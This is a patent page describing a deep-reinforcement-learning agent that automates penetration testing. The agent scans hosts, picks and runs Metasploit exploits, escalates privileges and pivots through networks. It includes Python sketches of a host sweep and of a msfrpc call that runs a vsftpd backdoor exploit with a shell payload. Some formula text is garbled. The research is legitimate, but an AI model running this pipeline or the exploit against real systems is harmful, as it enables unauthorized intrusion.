CN117235742A - Intelligent penetration test method and system based on deep reinforcement learning - Google Patents

Intelligent penetration test method and system based on deep reinforcement learning

Info

Publication number
CN117235742A
Authority
CN
China
Prior art keywords
action
target host
reinforcement learning
target
deep reinforcement
Prior art date
Legal status
Granted
Application number
CN202311504014.2A
Other languages
Chinese (zh)
Other versions
CN117235742B (en)
Inventor
刘京菊
张悦
周仕承
侯冬冬
王永杰
钟晓峰
任乾坤
Current Assignee
National University of Defense Technology
Original Assignee
National University of Defense Technology
Priority date
Filing date
Publication date
Application filed by National University of Defense Technology
Priority to CN202311504014.2A
Publication of CN117235742A
Application granted
Publication of CN117235742B
Legal status: Active

Landscapes

  • Machine Translation (AREA)
  • Debugging And Monitoring (AREA)

Abstract

The invention provides an intelligent penetration test method and system based on deep reinforcement learning, belonging to the technical field of penetration testing. The invention characterizes the state space based on a text embedding technique, makes penetration test action decisions based on deep reinforcement learning, and performs automatic load invocation based on the Metasploit database; learning and training can be carried out in diversified target machine environments, and the agent's decision-making capability evolves over the course of iterative training.

Description

Intelligent penetration test method and system based on deep reinforcement learning
Technical Field
The invention belongs to the technical field of penetration testing, and particularly relates to an intelligent penetration testing method and system based on deep reinforcement learning.
Background
Reinforcement learning is a general framework for solving sequential decision problems. With the Markov decision process (MDP) model as its mathematical foundation, an optimal strategy can be learned by trial and error through continuous interaction with the environment.
Deep reinforcement learning combines deep learning and reinforcement learning, retaining deep learning's ability to perceive high-dimensional feature data and reinforcement learning's decision-making capability, and can be used to solve complex decision problems in real environments.
At present, deep reinforcement learning is applied successfully in fields such as autonomous driving, robot control, stock trading and video games.
Penetration testing is an authorized, active network security assessment method. Unlike traditional defensive approaches such as intrusion detection and firewall technology, it aims to discover potential vulnerabilities of a target network system from the attacker's perspective, and can therefore assess potential threats more comprehensively.
Existing intelligent penetration test platforms aim to train an agent to find the optimal penetration test path in a specific network environment. Intelligent penetration test systems represented by AutoPentest combine attack graphs with deep reinforcement learning algorithms; their training process depends on prior knowledge of the target network environment, the process of constructing the attack graph is complex, and they are difficult to apply in real network environments.
DeepExploit is a penetration test system based on deep reinforcement learning. Its bottom layer uses Metasploit for tool invocation, and reinforcement learning is used to improve penetration test efficiency; however, its definition of the state space is flawed, and the trained model is difficult to apply to other targets.
Disclosure of Invention
Aiming at the defects in the prior art, the invention provides an intelligent penetration test scheme based on deep reinforcement learning.
The first aspect of the invention provides an intelligent penetration test method based on deep reinforcement learning, which comprises the following steps: step S1, acquiring a state vector of a target host and inputting the state vector to a deep reinforcement learning decision maker, wherein the deep reinforcement learning decision maker determines an executable action for the target host according to an action execution policy; step S2, executing the determined executable action on the target host with a tool load corresponding to the determined executable action, so as to acquire a feedback result and a reward signal of the target host after the determined executable action is executed; step S3, inputting the feedback result to the denoising autoencoder TSDAE to update the state vector of the target host, and inputting the reward signal to the deep reinforcement learning decision maker to update the action execution policy.
The executable actions include: a first action for determining open port information of the target host; a second action for testing vulnerabilities present in the target host and acquiring a first privilege on the target host; and a third action for further acquiring a second privilege on the target host once the first privilege has been acquired, the second privilege being higher than the first privilege.
The method according to the first aspect of the invention further comprises: step S0, performing survivability detection on each host in the target network based on the ICMP and ARP protocols, and selecting the target host by breadth-first search from the plurality of hosts that pass the survivability detection.
Step S0 specifically includes: acquiring the address of the target network, sending survivability detection messages to the address of the target network based on the ICMP and ARP protocols, and receiving the survivability detection response messages to determine the plurality of hosts that pass the survivability detection; adding the plurality of hosts that pass the survivability detection to a queue of target hosts to be tested, and selecting a target IP from the queue by breadth-first search; initializing the state vector of the host corresponding to the target IP, judging whether the number of actions already executed on the host corresponding to the target IP exceeds a threshold, and if not, taking the host corresponding to the target IP as the target host.
According to the method of the first aspect of the invention, in step S1: the acquired state vector of the target host is a one-dimensional vector comprising the target host's access control state, open port list, running service list, operating system information, page fingerprint information and historically executed actions; the action execution policy adopts a reinforcement learning algorithm over a discrete action space, the neural network of the deep reinforcement learning decision maker determines the selection probability of each executable action in the action space given the state vector of the target host, and the executable action with the highest selection probability is taken as the executable action for the target host.
According to the method of the first aspect of the present invention, in step S2, the tool load corresponding to the determined executable action is selected from the Metasploit database, and the determined executable action is executed on the target host; specifically: when the first action is executed, Nmap and WhatWeb are used to automatically detect the target host's open ports, running services, operating system and page fingerprints; the feedback information acquired after the first action is executed is the open port information of the target host and the potential vulnerabilities of the target host further determined based on that open port information; when the second action is executed, the vulnerability test script corresponding to the second action is retrieved from the Metasploit database and executed; the feedback information acquired after the second action is executed is the vulnerabilities of the target host determined from the vulnerability test result and the first privilege on the target host further acquired once the vulnerabilities are confirmed to exist; when the third action is executed, the post-penetration test script corresponding to the third action is retrieved from the Metasploit database and executed; the feedback information acquired after the third action is executed is the penetration status of the target host determined from the penetration test result and the further acquired second privilege on the target host.
According to the method of the first aspect of the present invention, in step S2, the reward signal is calculated as follows: for the case of executing the first action, the reward signal r1 = -Cost(a), where Cost(a) represents the cost of executing the first action; for the case of executing the second action, the reward signal r2 = Value(h1) - Cost(b), where Value(h1) represents the forward value after the first privilege is acquired and Cost(b) represents the cost of executing the second action; for the case of executing the third action, the reward signal r3 = Value(h2) - Cost(c), where Value(h2) represents the forward value after the second privilege is acquired and Cost(c) represents the cost of executing the third action. The experience tuple $(s, a, r, s')$ is stored in an experience replay pool, where $s$ is the current state vector, $a$ is the currently executed action, $r$ is the reward signal, and $s'$ is the next state vector.
According to the method of the first aspect of the present invention, in step S3, the denoising autoencoder TSDAE comprises an encoder, a pooling layer and a decoder; after passing through TSDAE, the feedback result yields a fixed-length dense vector, which is used to update the state vector of the target host. The objective function used when training TSDAE is:

$$J(\theta)=\mathbb{E}_{x\sim D}\left[\sum_{t=1}^{l}\log\frac{\exp\!\left(h_t^{\top}e_t\right)}{\sum_{i=1}^{N}\exp\!\left(h_t^{\top}e_i\right)}\right]$$

where $D$ is the data set of training sentences, $x$ is the set of tokens obtained by tokenizing a sentence, $e_t$ is the word vector of token $x_t$, $N$ is the vocabulary size, $h_t$ is the hidden state at step $t$ of the decoding process, and $l$ is the total number of decoding steps.
According to the method of the first aspect of the present invention, in step S3, the deep reinforcement learning decision maker is trained with the proximal policy optimization algorithm PPO. When the action execution policy is updated, PPO samples experience tuples $(s_t, a_t, r_t, s_{t+1})$ from the experience replay pool and calculates the policy update amplitude

$$r_t(\theta)=\frac{\pi_\theta(a_t\mid s_t)}{\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)}$$

where $\pi_\theta(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the updated policy, and $\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the old policy.

The loss function of the actor network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{actor}}(\theta)=\mathbb{E}_t\!\left[\min\!\left(r_t(\theta)\hat{A}_t,\ \mathrm{clip}\!\left(r_t(\theta),\,1-\epsilon,\,1+\epsilon\right)\hat{A}_t\right)\right]$$

where the advantage function $\hat{A}_t=Q(s_t,a_t)-V(s_t)$, $Q(s_t,a_t)$ represents the value of taking action $a_t$ in state $s_t$ under the old policy, $V(s_t)$ represents the average value of the actions taken in state $s_t$ under the old policy, clip is the clipping function, $\epsilon$ is a hyperparameter that controls the strength of the clipping, and $\mathbb{E}$ denotes expectation;

the loss function of the critic network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{critic}}=\mathbb{E}_t\!\left[\left(V_\theta(s_t)-R_t\right)^2\right]$$

where $V_\theta(s_t)$ represents the expected return of state $s_t$ and $R_t$ represents the true return of state $s_t$.
The second aspect of the invention provides an intelligent penetration test system based on deep reinforcement learning. The system comprises: a first processing unit configured to: acquire a state vector of a target host and input the state vector to a deep reinforcement learning decision maker, wherein the deep reinforcement learning decision maker determines an executable action for the target host according to an action execution policy; a second processing unit configured to: execute the determined executable action on the target host with a tool load corresponding to the determined executable action, so as to acquire a feedback result and a reward signal of the target host after the determined executable action is executed; a third processing unit configured to: input the feedback result to the denoising autoencoder TSDAE to update the state vector of the target host, and input the reward signal to the deep reinforcement learning decision maker to update the action execution policy.
The executable actions include: a first action for determining open port information of the target host; a second action for testing vulnerabilities present in the target host and acquiring a first privilege on the target host; and a third action for further acquiring a second privilege on the target host once the first privilege has been acquired, the second privilege being higher than the first privilege.
The system according to the second aspect of the present invention further comprises a preprocessing unit configured to: perform survivability detection on each host in the target network based on the ICMP and ARP protocols, and select the target host by breadth-first search from the plurality of hosts that pass the survivability detection.
The preprocessing unit is specifically configured to: acquire the address of the target network, send survivability detection messages to the address of the target network based on the ICMP and ARP protocols, and receive the survivability detection response messages to determine the plurality of hosts that pass the survivability detection; add the plurality of hosts that pass the survivability detection to a queue of target hosts to be tested, and select a target IP from the queue by breadth-first search; initialize the state vector of the host corresponding to the target IP, judge whether the number of actions already executed on the host corresponding to the target IP exceeds a threshold, and if not, take the host corresponding to the target IP as the target host.
According to the system of the second aspect of the present invention, the acquired state vector of the target host is a one-dimensional vector comprising the target host's access control state, open port list, running service list, operating system information, page fingerprint information and historically executed actions; the action execution policy adopts a reinforcement learning algorithm over a discrete action space, the neural network of the deep reinforcement learning decision maker determines the selection probability of each executable action in the action space given the state vector of the target host, and the executable action with the highest selection probability is taken as the executable action for the target host.
According to the system of the second aspect of the present invention, the second processing unit is specifically configured to: select the tool load corresponding to the determined executable action from the Metasploit database and execute the determined executable action on the target host; specifically: when the first action is executed, Nmap and WhatWeb are used to automatically detect the target host's open ports, running services, operating system and page fingerprints; the feedback information acquired after the first action is executed is the open port information of the target host and the potential vulnerabilities of the target host further determined based on that open port information; when the second action is executed, the vulnerability test script corresponding to the second action is retrieved from the Metasploit database and executed; the feedback information acquired after the second action is executed is the vulnerabilities of the target host determined from the vulnerability test result and the first privilege on the target host further acquired once the vulnerabilities are confirmed to exist; when the third action is executed, the post-penetration test script corresponding to the third action is retrieved from the Metasploit database and executed; the feedback information acquired after the third action is executed is the penetration status of the target host determined from the penetration test result and the further acquired second privilege on the target host.
According to the system of the second aspect of the present invention, the second processing unit is specifically configured to calculate the reward signal as follows: for the case of executing the first action, the reward signal r1 = -Cost(a), where Cost(a) represents the cost of executing the first action; for the case of executing the second action, the reward signal r2 = Value(h1) - Cost(b), where Value(h1) represents the forward value after the first privilege is acquired and Cost(b) represents the cost of executing the second action; for the case of executing the third action, the reward signal r3 = Value(h2) - Cost(c), where Value(h2) represents the forward value after the second privilege is acquired and Cost(c) represents the cost of executing the third action. The experience tuple $(s, a, r, s')$ is stored in an experience replay pool, where $s$ is the current state vector, $a$ is the currently executed action, $r$ is the reward signal, and $s'$ is the next state vector.
According to the system of the second aspect of the present invention, the third processing unit is specifically configured such that the denoising autoencoder TSDAE comprises an encoder, a pooling layer and a decoder; after passing through TSDAE, the feedback result yields a fixed-length dense vector, which is used to update the state vector of the target host. The objective function used when training TSDAE is:

$$J(\theta)=\mathbb{E}_{x\sim D}\left[\sum_{t=1}^{l}\log\frac{\exp\!\left(h_t^{\top}e_t\right)}{\sum_{i=1}^{N}\exp\!\left(h_t^{\top}e_i\right)}\right]$$

where $D$ is the data set of training sentences, $x$ is the set of tokens obtained by tokenizing a sentence, $e_t$ is the word vector of token $x_t$, $N$ is the vocabulary size, $h_t$ is the hidden state at step $t$ of the decoding process, and $l$ is the total number of decoding steps.
According to the system of the second aspect of the present invention, the second processing unit is specifically configured to train the deep reinforcement learning decision maker with the proximal policy optimization algorithm PPO. When the action execution policy is updated, PPO samples experience tuples $(s_t, a_t, r_t, s_{t+1})$ from the experience replay pool and calculates the policy update amplitude

$$r_t(\theta)=\frac{\pi_\theta(a_t\mid s_t)}{\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)}$$

where $\pi_\theta(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the updated policy, and $\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the old policy.

The loss function of the actor network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{actor}}(\theta)=\mathbb{E}_t\!\left[\min\!\left(r_t(\theta)\hat{A}_t,\ \mathrm{clip}\!\left(r_t(\theta),\,1-\epsilon,\,1+\epsilon\right)\hat{A}_t\right)\right]$$

where the advantage function $\hat{A}_t=Q(s_t,a_t)-V(s_t)$, $Q(s_t,a_t)$ represents the value of taking action $a_t$ in state $s_t$ under the old policy, $V(s_t)$ represents the average value of the actions taken in state $s_t$ under the old policy, clip is the clipping function, $\epsilon$ is a hyperparameter that controls the strength of the clipping, and $\mathbb{E}$ denotes expectation;

the loss function of the critic network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{critic}}=\mathbb{E}_t\!\left[\left(V_\theta(s_t)-R_t\right)^2\right]$$

where $V_\theta(s_t)$ represents the expected return of state $s_t$ and $R_t$ represents the true return of state $s_t$.
A third aspect of the invention discloses an electronic device. The electronic device includes a memory and a processor, the memory storing a computer program, the processor implementing the steps in the intelligent penetration test method based on deep reinforcement learning according to the first aspect of the disclosure when executing the computer program.
A fourth aspect of the invention discloses a computer-readable storage medium. The computer readable storage medium stores a computer program which, when executed by a processor, implements the steps in an intelligent penetration test method based on deep reinforcement learning according to the first aspect of the present disclosure.
In summary, the technical scheme provided by the invention characterizes the state space based on a text embedding technique, makes penetration test action decisions based on deep reinforcement learning, and performs automatic load invocation based on the Metasploit database; learning and training can be carried out in diversified target machine environments, and the agent's decision-making capability evolves over the course of iterative training.
Drawings
In order to more clearly illustrate the embodiments of the invention or the technical solutions in the prior art, the drawings which are required in the description of the embodiments or the prior art will be briefly described, it being obvious that the drawings in the description below are some embodiments of the invention and that other drawings may be obtained from these drawings without inventive effort for a person skilled in the art.
FIG. 1 is a diagram of the architecture composition of a deep reinforcement learning based intelligent penetration test according to an embodiment of the present invention.
FIG. 2 is a flow chart of a method for intelligent penetration testing based on deep reinforcement learning according to an embodiment of the present invention.
Fig. 3 is a block diagram of the denoising autoencoder TSDAE according to an embodiment of the present invention.
Fig. 4 is a block diagram of an electronic device according to an embodiment of the present invention.
Detailed Description
For the purpose of making the objects, technical solutions and advantages of the embodiments of the present invention more apparent, the technical solutions of the embodiments of the present invention will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present invention, and it is apparent that the described embodiments are only some embodiments of the present invention, not all embodiments of the present invention. All other embodiments, which can be made by those skilled in the art based on the embodiments of the invention without making any inventive effort, are intended to be within the scope of the invention.
The first aspect of the invention provides an intelligent penetration test method based on deep reinforcement learning. The method comprises the following steps: step S1, acquiring a state vector of a target host and inputting the state vector to a deep reinforcement learning decision maker, wherein the deep reinforcement learning decision maker determines an executable action for the target host according to an action execution policy; step S2, executing the determined executable action on the target host with a tool load corresponding to the determined executable action, so as to acquire a feedback result and a reward signal of the target host after the determined executable action is executed; step S3, inputting the feedback result to the denoising autoencoder TSDAE to update the state vector of the target host, and inputting the reward signal to the deep reinforcement learning decision maker to update the action execution policy.
The executable actions include: a first action for determining open port information of the target host; a second action for testing vulnerabilities present in the target host and acquiring a first privilege on the target host; and a third action for further acquiring a second privilege on the target host once the first privilege has been acquired, the second privilege being higher than the first privilege.
The method according to the first aspect of the invention further comprises: step S0, performing survivability detection on each host in the target network based on the ICMP and ARP protocols, and selecting the target host by breadth-first search from the plurality of hosts that pass the survivability detection.
Step S0 specifically includes: acquiring the address of the target network, sending survivability detection messages to the address of the target network based on the ICMP and ARP protocols, and receiving the survivability detection response messages to determine the plurality of hosts that pass the survivability detection; adding the plurality of hosts that pass the survivability detection to a queue of target hosts to be tested, and selecting a target IP from the queue by breadth-first search; initializing the state vector of the host corresponding to the target IP, judging whether the number of actions already executed on the host corresponding to the target IP exceeds a threshold, and if not, taking the host corresponding to the target IP as the target host.
According to the method of the first aspect of the invention, in step S1: the acquired state vector of the target host is a one-dimensional vector comprising the target host's access control state, open port list, running service list, operating system information, page fingerprint information and historically executed actions; the action execution policy adopts a reinforcement learning algorithm over a discrete action space, the neural network of the deep reinforcement learning decision maker determines the selection probability of each executable action in the action space given the state vector of the target host, and the executable action with the highest selection probability is taken as the executable action for the target host.
According to the method of the first aspect of the present invention, in step S2, the tool load corresponding to the determined executable action is selected from the Metasploit database, and the determined executable action is executed on the target host; specifically: when the first action is executed, Nmap and WhatWeb are used to automatically detect the target host's open ports, running services, operating system and page fingerprints; the feedback information acquired after the first action is executed is the open port information of the target host and the potential vulnerabilities of the target host further determined based on that open port information; when the second action is executed, the vulnerability test script corresponding to the second action is retrieved from the Metasploit database and executed; the feedback information acquired after the second action is executed is the vulnerabilities of the target host determined from the vulnerability test result and the first privilege on the target host further acquired once the vulnerabilities are confirmed to exist; when the third action is executed, the post-penetration test script corresponding to the third action is retrieved from the Metasploit database and executed; the feedback information acquired after the third action is executed is the penetration status of the target host determined from the penetration test result and the further acquired second privilege on the target host.
According to the method of the first aspect of the present invention, in step S2, the reward signal is calculated as follows: for the case of executing the first action, the reward signal r1 = -Cost(a), where Cost(a) represents the cost of executing the first action; for the case of executing the second action, the reward signal r2 = Value(h1) - Cost(b), where Value(h1) represents the forward value after the first privilege is acquired and Cost(b) represents the cost of executing the second action; for the case of executing the third action, the reward signal r3 = Value(h2) - Cost(c), where Value(h2) represents the forward value after the second privilege is acquired and Cost(c) represents the cost of executing the third action. The experience tuple $(s, a, r, s')$ is stored in an experience replay pool, where $s$ is the current state vector, $a$ is the currently executed action, $r$ is the reward signal, and $s'$ is the next state vector.
According to the method of the first aspect of the present invention, in step S3, the denoising autoencoder TSDAE comprises an encoder, a pooling layer and a decoder; after passing through TSDAE, the feedback result yields a fixed-length dense vector, which is used to update the state vector of the target host. The objective function used when training TSDAE is:

$$J(\theta)=\mathbb{E}_{x\sim D}\left[\sum_{t=1}^{l}\log\frac{\exp\!\left(h_t^{\top}e_t\right)}{\sum_{i=1}^{N}\exp\!\left(h_t^{\top}e_i\right)}\right]$$

where $D$ is the data set of training sentences, $x$ is the set of tokens obtained by tokenizing a sentence, $e_t$ is the word vector of token $x_t$, $N$ is the vocabulary size, $h_t$ is the hidden state at step $t$ of the decoding process, and $l$ is the total number of decoding steps.
According to the method of the first aspect of the present invention, in step S3, the deep reinforcement learning decision maker is trained with the proximal policy optimization algorithm PPO. When the action execution policy is updated, PPO samples experience tuples $(s_t, a_t, r_t, s_{t+1})$ from the experience replay pool and calculates the policy update amplitude

$$r_t(\theta)=\frac{\pi_\theta(a_t\mid s_t)}{\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)}$$

where $\pi_\theta(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the updated policy, and $\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the old policy.

The loss function of the actor network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{actor}}(\theta)=\mathbb{E}_t\!\left[\min\!\left(r_t(\theta)\hat{A}_t,\ \mathrm{clip}\!\left(r_t(\theta),\,1-\epsilon,\,1+\epsilon\right)\hat{A}_t\right)\right]$$

where the advantage function $\hat{A}_t=Q(s_t,a_t)-V(s_t)$, $Q(s_t,a_t)$ represents the value of taking action $a_t$ in state $s_t$ under the old policy, $V(s_t)$ represents the average value of the actions taken in state $s_t$ under the old policy, clip is the clipping function, $\epsilon$ is a hyperparameter that controls the strength of the clipping, and $\mathbb{E}$ denotes expectation;

the loss function of the critic network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{critic}}=\mathbb{E}_t\!\left[\left(V_\theta(s_t)-R_t\right)^2\right]$$

where $V_\theta(s_t)$ represents the expected return of state $s_t$ and $R_t$ represents the true return of state $s_t$.
In some embodiments, as shown in FIG. 1, the system comprises a target selector, a state information encoder, a deep reinforcement learning decision maker and an action library. The target selector selects the target to be tested according to the detection result of the target network environment. The decision maker receives the state vector of the target environment and selects from the action library an executable action on the target; the output action is executed on the target under test, yielding a feedback result of the action execution and a reward signal. The feedback result is input to the encoder to update the state vector, and the reward signal is input to the decision maker for policy optimization.
In some embodiments, as shown in fig. 2, the operational flow includes: step 101: detecting liveness in the target network and initializing the queue of targets to be tested; step 102: judging whether the queue is empty; step 103: the target selector selects a target host and initializes its state space; step 104: judging whether the maximum number of interactions has been reached; step 105: deciding the next action based on the deep reinforcement learning algorithm; step 106: selecting a tool load based on the Metasploit database and executing the action; step 107: obtaining the action execution result feedback and the reward signal; step 108: updating the target host state space; step 109: judging whether the target host privilege has been acquired; step 110: the deep reinforcement learning decision maker performs a policy update; step 111: discovering intranet nodes, constructing a proxy, and updating the queue of targets to be tested.
Step 101: and detecting the activity of the target network, and initializing a target queue to be tested.
In some embodiments, the system initializes a target host queue to be tested in an initial state, performs network surviving host detection based on ICMP protocol and ARP protocol according to the input target network address, and stores the detected surviving host IP address into the target queue to be tested.
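As an illustration of this discovery step, the following sketch performs a combined ARP/ICMP sweep and fills the queue; it assumes the Scapy library is available, and the subnet address is a placeholder rather than anything specified by the patent:

```python
# Survivability detection sketch (step 101); assumes scapy is installed.
from collections import deque

from scapy.all import ARP, ICMP, IP, Ether, sr, srp

def discover_live_hosts(cidr: str) -> list[str]:
    """Return the IPs that answer an ARP request or an ICMP echo."""
    alive = set()
    # ARP sweep: reaches hosts on the local network segment.
    ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=cidr),
                 timeout=2, verbose=False)
    alive.update(rcv.psrc for _, rcv in ans)
    # ICMP echo sweep: also reaches routed hosts.
    ans, _ = sr(IP(dst=cidr) / ICMP(), timeout=2, verbose=False)
    alive.update(rcv.src for _, rcv in ans)
    return sorted(alive)

# Initialize the queue of targets to be tested (placeholder subnet).
target_queue = deque(discover_live_hosts("192.168.56.0/24"))
```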
Step 102: and judging whether the queue is empty or not.
In some embodiments, it is determined whether the current target queue to be tested is empty, if so, the system ends operation, otherwise, step 103 is entered.
Step 103: the target selector selects a target host and initializes the state space.
In some embodiments, the target selector selects a target IP by breadth-first search from the current queue of targets to be tested, and removes that target from the queue. The state space of the target is initialized, including the target host's access control state, open port list, running service list, operating system information, web fingerprint information, and the list of actions executed on the target. The state space is initialized as a one-dimensional, fixed-length vector of zeros, and the list of actions executed on the target is initialized as empty.
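A minimal sketch of the target selector, assuming the deque built above; the state-vector length is an illustrative constant, not a value given in the patent:

```python
import numpy as np

STATE_DIM = 256  # fixed length of the one-dimensional state vector (assumed value)

def select_target(target_queue):
    """Pop the next target IP in breadth-first (FIFO) order and zero-init its state."""
    if not target_queue:
        return None, None, None
    ip = target_queue.popleft()                    # BFS over discovered hosts
    state = np.zeros(STATE_DIM, dtype=np.float32)  # one-dimensional vector of 0s
    executed_actions: list[str] = []               # action history starts empty
    return ip, state, executed_actions
```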
Step 104: and judging whether the maximum interaction times are reached.
In some embodiments, it is determined whether the number of actions currently performed on the target reaches a maximum number based on a set threshold. If the maximum number of times has been reached, step 102 is entered, otherwise step 105 is entered.
Step 105: the next action is decided based on the deep reinforcement learning algorithm.
In some embodiments, the state vector of the target host produced by the state-space encoder is input to the deep reinforcement learning decision maker, which outputs the next executable action. The system makes decisions with a reinforcement learning algorithm over a discrete action space; the neural network outputs the selection probability corresponding to each action in the action space, and the action with the highest selection probability is output.
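This decision step can be pictured as below, a hedged PyTorch sketch; the greedy argmax readout follows the description above, while the network shape and hidden width are assumptions:

```python
import torch
import torch.nn as nn

class PolicyNet(nn.Module):
    """Maps a state vector to selection probabilities over a discrete action space."""
    def __init__(self, state_dim: int, n_actions: int):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(state_dim, 128), nn.ReLU(),  # width 128 is illustrative
            nn.Linear(128, n_actions),
        )

    def forward(self, state: torch.Tensor) -> torch.Tensor:
        return torch.softmax(self.net(state), dim=-1)

def decide_next_action(policy: PolicyNet, state) -> int:
    """Output the action with the highest selection probability."""
    with torch.no_grad():
        probs = policy(torch.as_tensor(state).float())
    return int(probs.argmax().item())
```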
Step 106: selecting a tool load to perform an action based on the metaprofile database.
In some embodiments, the step selects a corresponding tool load to execute according to the executable action output by the decision maker, and the action space of the system comprises an information scanning class, a vulnerability testing class and a permission maintenance class. For the information scanning class, the system calls tools such as Nmap, whatweb and the like to automatically detect the open port, running service, operating system and web fingerprint of the target host. Aiming at the vulnerability test and authority maintenance class, the system searches the corresponding vulnerability test script or the post-penetration test script from the Metasplot database according to the decision result of the decision maker and executes the vulnerability test script to acquire the control authority of the target host. The system builds a load parameter configuration database, and calls the setting parameters and execution of the msfrpcd interface in an automatic flow arrangement mode.
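One way to drive msfrpcd from Python is the third-party pymetasploit3 client; the sketch below is illustrative only, and the module name, credentials, and the ACTION_LOADS table standing in for the load parameter configuration database are all assumptions:

```python
from pymetasploit3.msfrpc import MsfRpcClient  # pip install pymetasploit3

# Connect to a running msfrpcd instance (password and port are placeholders).
client = MsfRpcClient('password', port=55553, ssl=True)

# Illustrative stand-in for the load parameter configuration database.
ACTION_LOADS = {
    'exploit_vsftpd': {
        'module': 'unix/ftp/vsftpd_234_backdoor',
        'payload': 'cmd/unix/interact',
    },
}

def execute_action(action_name: str, target_ip: str):
    """Look up the tool load for a decided action and run it against the target."""
    load = ACTION_LOADS[action_name]
    exploit = client.modules.use('exploit', load['module'])
    exploit['RHOSTS'] = target_ip
    result = exploit.execute(payload=load['payload'])
    # Any new session indicates that control privileges were obtained.
    return result, client.sessions.list
```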
Step 107: and obtaining action execution result feedback and a reward signal.
In some embodiments, the end of the execution of the action may obtain a feedback result, where the feedback result exists in the form of text, for example, performing the port scan action may obtain port information of the target opening, performing the vulnerability test action may obtain whether the test is successful, the obtained control session number, and so on. Meanwhile, the system calculates a reward signal according to the execution result, wherein the reward signal is a measure of the quality of the current action selection result, is the balance between the value of the target host and the cost of taking action, and adopts a formulaCalculation of>Represents the forward value obtained after obtaining the rights of host h,representing execution of an action->At the cost of (2). Feedback of the result of action execution for updating the target state vector at step 108, the system updates the current state vector, the next state vector after action execution, the current execution action, and the reward signal +.>The experience playback pool is logged for policy updates.
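A small sketch of the reward computation and experience bookkeeping, assuming the Value and Cost terms are supplied by the caller as in the formula above:

```python
replay_pool = []  # experience replay pool of (s, a, r, s') tuples

def compute_reward(value_gained: float, action_cost: float) -> float:
    """r = Value(h) - Cost(a): value of privileges gained minus the action's cost."""
    return value_gained - action_cost

def record_transition(s, a, r, s_next) -> None:
    """Store the transition used later for the PPO policy update (step 110)."""
    replay_pool.append((s, a, r, s_next))
```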
Step 108: updating the target host state space.
In some embodiments, the system updates the current state vector according to the feedback information of the action execution result. The system trains an embedding model of the state space with TSDAE, a denoising autoencoder based on the Transformer architecture; the raw text information fed back by an action is input to TSDAE, which outputs a fixed-length dense vector. The system collects an internet-based network security corpus, with data drawn from the NVD database, the Metasploit database and various security forums; the data are input to TSDAE in sentence form, and the embedding model is trained by unsupervised learning. The TSDAE structure is shown in fig. 3: it accepts noise-corrupted text and encodes it into a fixed-length sentence vector, from which the decoder reconstructs the original input. The objective function of the training process is defined as:

$$J(\theta)=\mathbb{E}_{x\sim D}\left[\sum_{t=1}^{l}\log\frac{\exp\!\left(h_t^{\top}e_t\right)}{\sum_{i=1}^{N}\exp\!\left(h_t^{\top}e_i\right)}\right]$$

where $D$ is the data set of training sentences, $x$ is the set of tokens obtained by tokenizing a sentence, $e_t$ is the word vector of token $x_t$, $N$ is the vocabulary size, $h_t$ is the hidden state at step $t$ of the decoding process, and $l$ is the total number of decoding steps.
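Training such an embedding model can follow the TSDAE recipe shipped with the sentence-transformers library; the sketch below is a minimal version of that recipe, and the choice of bert-base-uncased as the backbone plus the three example sentences are assumptions:

```python
from torch.utils.data import DataLoader
from sentence_transformers import SentenceTransformer, models, losses, datasets

# Security corpus sentences (placeholders for NVD / Metasploit / forum text).
train_sentences = [
    "Port 21 open: vsftpd 2.3.4 detected on target host.",
    "Exploit completed, one meterpreter session opened.",
    "Apache httpd 2.4.49 is vulnerable to path traversal.",
]

# Encoder + CLS pooling yields the fixed-length dense sentence vector.
word_embedding = models.Transformer('bert-base-uncased')
pooling = models.Pooling(word_embedding.get_word_embedding_dimension(), 'cls')
model = SentenceTransformer(modules=[word_embedding, pooling])

# The dataset adds noise (word deletion) to each sentence; the loss trains a
# decoder to reconstruct the original input from the sentence vector.
train_data = datasets.DenoisingAutoEncoderDataset(train_sentences)
loader = DataLoader(train_data, batch_size=8, shuffle=True)
loss = losses.DenoisingAutoEncoderLoss(
    model, decoder_name_or_path='bert-base-uncased', tie_encoder_decoder=True)

model.fit(train_objectives=[(loader, loss)], epochs=1,
          weight_decay=0, scheduler='constantlr',
          optimizer_params={'lr': 3e-5})
```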
Step 109: and judging whether to acquire the target host permission.
In some embodiments, it is determined whether to acquire the target host permission according to the execution result of the action, if permission is acquired, step 111 is entered, otherwise step 110 is entered.
Step 110: the deep reinforcement learning decision maker performs policy updating.
In some embodiments, the system trains the decision maker with the proximal policy optimization algorithm (PPO). PPO is a deep reinforcement learning algorithm based on the actor-critic framework: the actor network outputs an action according to the current policy, and the critic network evaluates how good the policy is according to the current state and the output action. In the policy update phase, the algorithm samples a batch of $(s, a, r, s')$ data from the experience replay pool, where $s$ is a state vector, $a$ is the action executed in state $s$, $s'$ is the next state after taking action $a$ in state $s$, and $r$ is the reward obtained by executing action $a$. PPO computes the importance weight $r_t(\theta)=\pi_\theta(a_t\mid s_t)/\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)$ to constrain the update amplitude of the new policy relative to the old policy; the loss function for the actor network update is:

$$L^{\mathrm{actor}}(\theta)=\mathbb{E}_t\!\left[\min\!\left(r_t(\theta)\hat{A}_t,\ \mathrm{clip}\!\left(r_t(\theta),\,1-\epsilon,\,1+\epsilon\right)\hat{A}_t\right)\right]$$

